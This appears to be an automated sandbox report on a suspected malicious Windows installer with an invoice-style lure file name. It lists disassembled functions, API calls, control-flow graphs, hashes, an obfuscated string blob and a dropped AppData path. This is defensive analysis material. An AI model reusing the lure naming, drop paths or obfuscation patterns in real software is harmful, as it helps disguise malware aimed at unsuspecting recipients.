                                                        Function 0040303A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 552 40303a-403063 GetTickCount 553 4031a4-4031ac call 402bda 552->553 554 403069-403094 call 4031cc SetFilePointer 552->554 559 4031ae-4031b3 553->559 560 403099-4030ab 554->560 561 4030ad 560->561 562 4030af-4030bd call 4031b6 560->562 561->562 565 4030c3-4030cf 562->565 566 403196-403199 562->566 567 4030d5-4030db 565->567 566->559 568 403106-403122 call 406109 567->568 569 4030dd-4030e3 567->569 575 403124-40312c 568->575 576 40319f 568->576 569->568 570 4030e5-403105 call 402bda 569->570 570->568 578 403160-403166 575->578 579 40312e-403144 WriteFile 575->579 577 4031a1-4031a2 576->577 577->559 578->576 580 403168-40316a 578->580 581 403146-40314a 579->581 582 40319b-40319d 579->582 580->576 584 40316c-40317f 580->584 581->582 583 40314c-403158 581->583 582->577 583->567 585 40315e 583->585 584->560 586 403185-403194 SetFilePointer 584->586 585->584 586->553
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 0040304F
                                                          • Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
                                                        • WriteFile.KERNELBASE(Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT,0040E1FF,00000000,00000000,00412888,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?), ref: 0040313C
                                                        • SetFilePointer.KERNELBASE(00063D29,00000000,00000000,00412888,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB), ref: 0040318E
                                                        Strings
                                                        • Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT, xrefs: 00403094, 00403135
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: File$Pointer$CountTickWrite
                                                        • String ID: Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT
                                                        • API String ID: 2146148272-112686333
                                                        • Opcode ID: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
                                                        • Instruction ID: d344cd596d8d4dd0b43dc6914abeb17836bbf3c0912801dceac3b69aa1d0b3ec
                                                        • Opcode Fuzzy Hash: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
                                                        • Instruction Fuzzy Hash: 7841C3729042019FD710AF29EE849663FFCF74835A711813BE414B72E0D7399D529B9E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 587 4015b3-4015c6 call 4029fd call 405807 592 4015c8-4015e3 call 405799 CreateDirectoryA 587->592 593 40160a-40160d 587->593 600 401600-401608 592->600 601 4015e5-4015f0 GetLastError 592->601 594 401638-402181 call 401423 593->594 595 40160f-40162a call 401423 call 405cde SetCurrentDirectoryA 593->595 608 402892-4028a1 594->608 595->608 611 401630-401633 595->611 600->592 600->593 604 4015f2-4015fb GetFileAttributesA 601->604 605 4015fd 601->605 604->600 604->605 605->600 611->608
                                                        APIs
                                                          • Part of subcall function 00405807: CharNextA.USER32(?,?,004210E8,?,00405873,004210E8,004210E8,?,?,76232EE0,004055BE,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405815
                                                          • Part of subcall function 00405807: CharNextA.USER32(00000000), ref: 0040581A
                                                          • Part of subcall function 00405807: CharNextA.USER32(00000000), ref: 0040582E
                                                        • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine,00000000,00000000,000000F0), ref: 00401622
                                                        Strings
                                                        • C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine, xrefs: 00401617
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                        • String ID: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine
                                                        • API String ID: 3751793516-3329137258
                                                        • Opcode ID: 6680b35b0edbfb8490efa218605708a5ac3e3ef274c755acae2fb438f6c2d17e
                                                        • Instruction ID: c68c5a489683e2fc4659e16c9c4aaa0bba9656052562f70290055e8dde3f70bb
                                                        • Opcode Fuzzy Hash: 6680b35b0edbfb8490efa218605708a5ac3e3ef274c755acae2fb438f6c2d17e
                                                        • Instruction Fuzzy Hash: E011E532908150ABDB117F755D4496F77B4EA62366728473FF891B22E2C23C4D42DA3E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040599E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 613 40599e-4059a8 614 4059a9-4059d4 GetTickCount GetTempFileNameA 613->614 615 4059e3-4059e5 614->615 616 4059d6-4059d8 614->616 618 4059dd-4059e0 615->618 616->614 617 4059da 616->617 617->618
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004059B2
                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059CC
                                                        Strings
                                                        • "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe", xrefs: 0040599E
                                                        • nsa, xrefs: 004059A9
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A1, 004059A5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-1636876243
                                                        • Opcode ID: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
                                                        • Instruction ID: 8c160f2977bc4404c48c8444970ea7289898f808bb444fb2a57fa0af4f665f22
                                                        • Opcode Fuzzy Hash: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
                                                        • Instruction Fuzzy Hash: 4AF08976748304ABD7105F55DC04B9B7B98EF91760F148037F904DB180D5B49954C765
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406109 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 619 406109-40612c 620 406136-406139 619->620 621 40612e-406131 619->621 623 40613c-406145 620->623 622 406b56-406b5a 621->622 624 406b53 623->624 625 40614b 623->625 624->622 626 406152-406156 625->626 627 406292-406939 625->627 628 4061f7-4061fb 625->628 629 406267-40626b 625->629 635 40615c-406169 626->635 636 406b3e-406b51 626->636 639 406953-406969 627->639 640 40693b-406951 627->640 633 406201-40621a 628->633 634 406aa7-406ab1 628->634 630 406271-406285 629->630 631 406ab6-406ac0 629->631 638 406288-406290 630->638 631->636 641 40621d-406221 633->641 634->636 635->624 637 40616f-4061b5 635->637 636->622 642 4061b7-4061bb 637->642 643 4061dd-4061df 637->643 638->627 638->629 644 40696c-406973 639->644 640->644 641->628 645 406223-406229 641->645 646 4061c6-4061d4 GlobalAlloc 642->646 647 4061bd-4061c0 GlobalFree 642->647 648 4061e1-4061eb 643->648 649 4061ed-4061f5 643->649 650 406975-406979 644->650 651 40699a-4069a6 644->651 652 406253-406265 645->652 653 40622b-406232 645->653 646->624 654 4061da 646->654 647->646 648->648 648->649 649->641 655 406b28-406b32 650->655 656 40697f-406997 650->656 651->623 652->638 658 406234-406237 GlobalFree 653->658 659 40623d-40624d GlobalAlloc 653->659 654->643 655->636 656->651 658->659 659->624 659->652
                                                        Strings
                                                        • Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT, xrefs: 00406109
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT
                                                        • API String ID: 0-112686333
                                                        • Opcode ID: 051121fa3874d8e8b755ab415ee1dff2938927d782d906638b2643d411ab8d22
                                                        • Instruction ID: 2ea2e7de70dfcb9b8a6977de9a23dc0afa47d6a26cb5075253e99f3f7356adb1
                                                        • Opcode Fuzzy Hash: 051121fa3874d8e8b755ab415ee1dff2938927d782d906638b2643d411ab8d22
                                                        • Instruction Fuzzy Hash: 16816771E04228DBDF24CFA8C8447ADBBB1FB44305F11816AD856BB281D778A996DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 660 401bb8-401bd0 call 4029e0 * 2 665 401bd2-401bd9 call 4029fd 660->665 666 401bdc-401be0 660->666 665->666 668 401be2-401be9 call 4029fd 666->668 669 401bec-401bf2 666->669 668->669 672 401bf4-401c08 call 4029e0 * 2 669->672 673 401c38-401c5e call 4029fd * 2 FindWindowExA 669->673 683 401c28-401c36 SendMessageA 672->683 684 401c0a-401c26 SendMessageTimeoutA 672->684 685 401c64 673->685 683->685 686 401c67-401c6a 684->686 685->686 687 401c70 686->687 688 402892-4028a1 686->688 687->688
                                                        APIs
                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
                                                        • Instruction ID: aec06c1df61e239cd4f76122eecd213935ad84fca4bb147c4325ce067fac4872
                                                        • Opcode Fuzzy Hash: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
                                                        • Instruction Fuzzy Hash: B82190B1A44208BFEF41AFB4CE4AAAE7BB5EF40344F14453EF541B61D1D6B89A40D728
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040231C Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 691 40231c-402362 call 402af2 call 4029fd * 2 RegCreateKeyExA 698 402892-4028a1 691->698 699 402368-402370 691->699 701 402380-402383 699->701 702 402372-40237f call 4029fd lstrlenA 699->702 705 402393-402396 701->705 706 402385-402392 call 4029e0 701->706 702->701 707 4023a7-4023bb RegSetValueExA 705->707 708 402398-4023a2 call 402f1f 705->708 706->705 712 4023c0-402496 RegCloseKey 707->712 713 4023bd 707->713 708->707 712->698 713->712
                                                        APIs
                                                        • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                                        • lstrlenA.KERNEL32(00409BB0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                                        • RegSetValueExA.KERNELBASE(?,?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                                        • RegCloseKey.KERNELBASE(?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateValuelstrlen
                                                        • String ID:
                                                        • API String ID: 1356686001-0
                                                        • Opcode ID: 42a98f93c9dfb85396e1c4e88c0bb033e1de74b0c76d2cf4d2a31f945ad1a69d
                                                        • Instruction ID: 9c4c752beb0f8e8bc138c26b394c9166cd94382eb1b14f60ad9d974daee8f686
                                                        • Opcode Fuzzy Hash: 42a98f93c9dfb85396e1c4e88c0bb033e1de74b0c76d2cf4d2a31f945ad1a69d
                                                        • Instruction Fuzzy Hash: C61172B1E00118BFEB10AFA4DE89EAF7678FB50358F10413AF905B61D1D7B85D01AB68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405491 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004214E8,Error launching installer), ref: 004054B6
                                                        • CloseHandle.KERNEL32(?), ref: 004054C3
                                                        Strings
                                                        • Error launching installer, xrefs: 004054A4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: Error launching installer
                                                        • API String ID: 3712363035-66219284
                                                        • Opcode ID: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
                                                        • Instruction ID: 3eb9eeac69da88a372b0c135ba7ac0e5d0d4abdecbe03941738571e2a7ac68f4
                                                        • Opcode Fuzzy Hash: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
                                                        • Instruction Fuzzy Hash: 31E0E674A0020AABDB10EFA4DD4596F7BBDEB10305B408531B914E2160D774D810CA79
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004031E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00405F49: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FA1
                                                          • Part of subcall function 00405F49: CharNextA.USER32(?,?,?,00000000), ref: 00405FAE
                                                          • Part of subcall function 00405F49: CharNextA.USER32(?,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FB3
                                                          • Part of subcall function 00405F49: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FC3
                                                        • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00403204
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 4115351271-3512041753
                                                        • Opcode ID: f80f4c6bea085b934f07f01a50d8cef12395f9d7bebc9578094670fc86bd733e
                                                        • Instruction ID: 96047f1703e1a12197270cf5e797561ca5ab02306a5825906e00d3d3d2912a57
                                                        • Opcode Fuzzy Hash: f80f4c6bea085b934f07f01a50d8cef12395f9d7bebc9578094670fc86bd733e
                                                        • Instruction Fuzzy Hash: D8D0922160AD30A2D551372A3E0AFCF150C8F46769F118077F808760C24BAC5A8269FE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004066ED Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21de50892f659123e4fedba565e9e2413225c8e826dcfa90f57619bb85df476e
                                                        • Instruction ID: b3fba2513e78c155f0b266b50acf783dae1ce9585f0b47354f4c941ebe2136ae
                                                        • Opcode Fuzzy Hash: 21de50892f659123e4fedba565e9e2413225c8e826dcfa90f57619bb85df476e
                                                        • Instruction Fuzzy Hash: 76A13071E00229CBDF28CFA8C8447ADBBB1FB44305F15816AD816BB281D7789A96DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004068EE Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
